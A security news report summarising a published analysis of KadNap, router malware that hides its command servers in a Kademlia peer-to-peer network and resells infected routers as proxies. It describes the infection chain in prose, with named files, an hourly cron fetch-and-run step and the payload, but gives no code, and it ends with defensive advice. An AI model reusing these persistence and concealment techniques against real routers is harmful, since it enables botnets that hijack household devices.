Researchers uncovered KadNap, a router malware first seen in August 2025 that has compromised more than 14,000 devices worldwide with over 60 percent of victims in the United States, a technical analysis by Lumen Black Lotus Labs said.
KEY FACTS
- Incident KadNap targets Asus and other edge routers
- Infections More than 14,000 devices, over 60% in the U.S.
- Technique Uses a Kademlia Distributed Hash Table peer-to-peer network to conceal C2
- Persistence Cron job downloads aic.sh, renames it to .asusrouter and executes a malicious ELF named kad
First detected in August 2025, the campaign has spread primarily in the United States with additional infections in Taiwan, Hong Kong, Russia, the U.K., Australia, Brazil, France, Italy and Spain, the report states.
The malware implements a custom Kademlia DHT protocol so compromised nodes can locate and connect with command servers without exposing a central infrastructure. The report says operators use the protocol to make communications resilient to monitoring and disruption.
The infection chain relies on a shell script named aic.sh retrieved from a command address. The script creates an hourly cron entry that fetches and runs the payload, renames files to .asusrouter, installs an ELF called kad and supports ARM and MIPS devices.
KadNap also queries a Network Time Protocol server and stores time and host uptime to create a hash used to locate peers. Supporting files are reported to disable SSH on port 22 and extract lists of IP:port combinations to contact.
Infected devices are offered as resident proxies through a service called Doppelgänger, assessed as a rebrand of a prior proxy service. The report notes that co-infections on some routers complicate attribution of specific malicious activity.
Defensive measures recommended include updating SOHO router firmware, rebooting devices regularly, changing default passwords, securing management interfaces and replacing unsupported end-of-life models.
WHY IT MATTERS
KadNap’s use of a decentralized peer-to-peer DHT makes the botnet harder to disrupt and enables compromised home and small office routers to be repurposed as anonymized proxy capacity for malicious actors.